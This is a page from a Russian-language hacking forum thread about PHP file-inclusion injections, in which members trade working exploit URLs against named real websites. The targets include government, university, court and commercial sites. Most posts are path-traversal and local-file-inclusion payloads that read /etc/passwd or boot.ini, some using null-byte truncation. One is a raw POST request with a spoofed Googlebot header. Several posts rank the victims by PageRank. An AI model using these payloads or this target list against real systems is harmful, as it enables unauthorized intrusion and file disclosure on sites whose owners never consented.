PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

Page 44 of 72
  1. -Hormold-

    -Hormold- Кто, если не ты?

    Joined:
    29 Sep 2007
    Messages:
    418
    Likes Received:
    290
    Reputations:
    44
    http://www.md5search.de/index.php?action=info&language=../../../../../../../../../../../../../etc/passwd%00
     
    #861 -Hormold-, 27 Mar 2009
    3 people like this.
  2. HIVER

    HIVER Member

    Joined:
    28 Oct 2008
    Messages:
    36
    Likes Received:
    18
    Reputations:
    0
    Code:
    http://katenok.pozitiv.lv/miau.php?p=../../../../../etc/passwd
     
    #862 HIVER, 27 Mar 2009
    1 person likes this.
  3. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    .gov =)

    datamil.delaware.gov
    Code:
    http://datamil.delaware.gov/topos/download.php?file=download.php
    странный сайт, по кэшу гугла когда то был корень,нынче пусто...

    Вобщем посмотрел на заголовок, увидел уже после того как нашел... =) eLouai's Download Script ищем в гугле такие есть еще... к примеру:
    Code:
    http://www.alllottoresults.com/force-download.php?file=index.php
    Code:
    http://jual-pulsa.com/download.php?file=v4/index.php
     
    #863 Kraneg, 6 Apr 2009
    Last edited: 6 Apr 2009
    3 people like this.
  4. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    смотрим название темы :)
    PHP-инъекты
    а это - читалка файлов.
     
    #864 geezer.code, 6 Apr 2009
    1 person likes this.
  5. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://www.gnpbu.iip.net/index.php?file=../../../../../boot.ini
     
    #865 Rubaka, 7 Apr 2009
    1 person likes this.
  6. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    http://globaldiscountsclub.com/index.php?option=com_pro_desk&include_file=../../../../../etc/passwd

    http://www.gardenlaw.co.uk/cgi-bin/view_ads.cgi?category=39&process=1&template=../../../../../etc/passwd

    http://www.jedit.org/index.php?page=features/?page=../../../../../../../../../../../../../etc/passwd%00

    http://www.emsc-csem.org/index.php?page=home&sub=gmap/?page=../../../../../../../../../../../../../etc/passwd%00

    http://www.bastian-friedrich.de/yappa//index.php?album=../../../../../../../../../../../../../etc/passwd

    http://medicalcraft.com//main/index.php?content=../../../../../../../../../../../../../etc/passwd

    http://www.velocos.ch/guestbook_e/admin.php?include_path=../../../../../../../../../../../../../../../etc/passwd%00

    http://www.hotelambrosianamilano.com/index.php?page=/etc/passwd

    http://www.mfa.gov.et/View_Commentaries/View.php?Page=../../../../../../etc/passwd

    http://www.worldwidepay.com/index.php?read=../../../../../../../../../../../../../../etc/passwd

    http://www.thinprint.com/view.php?page=../../../../../etc/passwd%00

    http://www.rbgarage.com/rbg/index.php?go=../../../../etc/passwd%00

    http://www.eurekalert.org/kidsnews/page.php?page=../../../../../../../etc/passwd%00
     
    #866 [underwater], 7 Apr 2009
    Last edited: 11 Apr 2009
    1 person likes this.
  7. +StArT+

    +StArT+ Elder - Старейшина

    Joined:
    10 Feb 2007
    Messages:
    24
    Likes Received:
    51
    Reputations:
    3
    www.unicaen.fr
    Université de Caen Basse-Normandie
    -----------------------------
    [​IMG] Page Rank: 7
    [​IMG] Alexa Rank: 14.516
    -----------------------------

    Code:
    POST http://www.unicaen.fr/mrsh/irefi/expos0.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Host: www.unicaen.fr
Content-type: application/x-www-form-urlencoded
Referer: http://www.google.com/

page=../../../../../etc/passwd[COLOR=White]['.str_repeat("/.",2021).'][/COLOR]
    -----------------------------
     
    #867 +StArT+, 9 Apr 2009
    Last edited: 9 Apr 2009
    4 people like this.
  8. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    http://www.balearsculturaltour.es/admin/aplicacion.php?cod=../../../../boot.ini
     
    #868 mailbrush, 10 Apr 2009
    1 person likes this.
  9. pantur

    pantur New Member

    Joined:
    3 Nov 2008
    Messages:
    5
    Likes Received:
    2
    Reputations:
    0
    Сайт, конечно, убогий, инклуд локальный, да еще open_basedir мешает. Как я понял, можно шарить по
    /var/www/virtual/peaceduke.su/. Дальше все закрыто, но в папку /tmp доступ есть.
     
    #869 pantur, 11 Apr 2009
    Last edited: 11 Apr 2009
  10. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    http://www.baikap.de/index2.php?include=../../../../../../../../../../../etc/passwd&id=2&language=EN
    вот от меня :)
    ЗЫ а искал вообще скул иньекции :)
     
    #870 satana8920, 12 Apr 2009
  11. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Windows+open_basedir+URL file-access is disabled

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Высший совет юстиции Украины! о как =)


    =====================================================
    ТиЦ PR
    425 6

    URL file-access is disabled in the server configuration
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Отель 27 жемчужин.
    =====================================================
    Что то плять никто ничего не постит..а тема ведь самая простая))

    PR 6
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Вроде как Арбитражный суд москвы! =)
     
    #871 $n@ke, 14 Apr 2009
    Last edited: 16 Apr 2009
    1 person likes this.
  12. Snap

    Snap Elder - Старейшина

    Joined:
    5 Feb 2007
    Messages:
    61
    Likes Received:
    33
    Reputations:
    -4
    http://www.raskleim.ru/
    http://www.raskleim.ru/?xid=title&sm=titles/../../../../../../../etc/passwd%00

    Расклейка объявлений, листовок и афиш в Санкт-Петербурге.
    Сайт фуфел конечно но уязвимость есть =)
     
    #872 Snap, 18 Apr 2009
  13. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    servizioclienti.repubblica.it
    PR 7

    Code:
    http://www.servizioclienti.repubblica.it/index.php?page=../../../../../../../../../../../../../etc/passwd%00
    aphp.fr
    PR 7

    Code:
    http://www.aphp.fr/index.php?module=../../../../../../../../../../../../../etc/passwd%00
    worldsteel.org
    PR 6

    Code:
    http://www.worldsteel.org/index.php?action=../../../../../../../../../../../../../etc/passwd%00
    www.reformtheun.org
    PR 6

    Code:
    http://www.reformtheun.org/index.php?module=../../../../../../../../../../../../../etc/passwd%00
    filmmusic.net
    PR 5

    Code:
    http://www.filmmusic.net/page.php?page=../../../../../../../../../../../../../etc/passwd%00
    thewho.com
    PR 5

    Code:
    http://www.thewho.com/index.php?module=../../../../../../../../../../../../../etc/passwd%00
     
    #873 ph1l1ster, 20 Apr 2009
    1 person likes this.
  14. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    2kgames.com
    pr6 | tic 400

    Code:
    http://www.2kgames.com/index.php?p=../../../../../../etc/passwd%00
    utbookstore.tennessee.edu

    Code:
    http://utbookstore.tennessee.edu/uccs/index.php?p=../../../../etc/passwd%00
    stefanmay.com

    Code:
    http://www.stefanmay.com/index.php?p=../../../../../etc/passwd%00
     
    #874 ph1l1ster, 21 Apr 2009
    4 people like this.
  15. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://www.myspace-layouts.us/pages.php?page=../index
     
    #875 Rubaka, 22 Apr 2009
    1 person likes this.
  16. BHYCHIK

    BHYCHIK Member

    Joined:
    30 Jan 2009
    Messages:
    52
    Likes Received:
    28
    Reputations:
    9
    http://www.vcdh.virginia.edu/index.php?page=../../../etc/passwd%00
     
    #876 BHYCHIK, 23 Apr 2009
  17. S00pY

    S00pY Active Member

    Joined:
    24 Apr 2007
    Messages:
    91
    Likes Received:
    109
    Reputations:
    21
    говно

    мде
     
    #877 S00pY, 26 Apr 2009
    Last edited by a moderator: 26 Apr 2009
    1 person likes this.
  18. Gar|k

    Gar|k Moderator

    Joined:
    20 Mar 2009
    Messages:
    1,166
    Likes Received:
    266
    Reputations:
    82
    http://rastaman.tales.ru/?page=lol&menu1=1&menu2=2&smenu1=1&inctext=6

    может и боян не знаю
    но сказки там клевые ) еще попробуйте поиздеватся над переменными остальные тоже много интересного
     
    _________________________
    #878 Gar|k, 29 Apr 2009
  19. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    _http://www.logicnsk.ru/price/?file=../../../../../../etc/passwd&cat_id=654
     
    _________________________
    #879 winstrool, 30 Apr 2009
    1 person likes this.
  20. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    http://gps.ck.ua/index.php?id=../../
     
    #880 udman, 9 May 2009
(You must log in or sign up to post here.)
Page 44 of 72
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.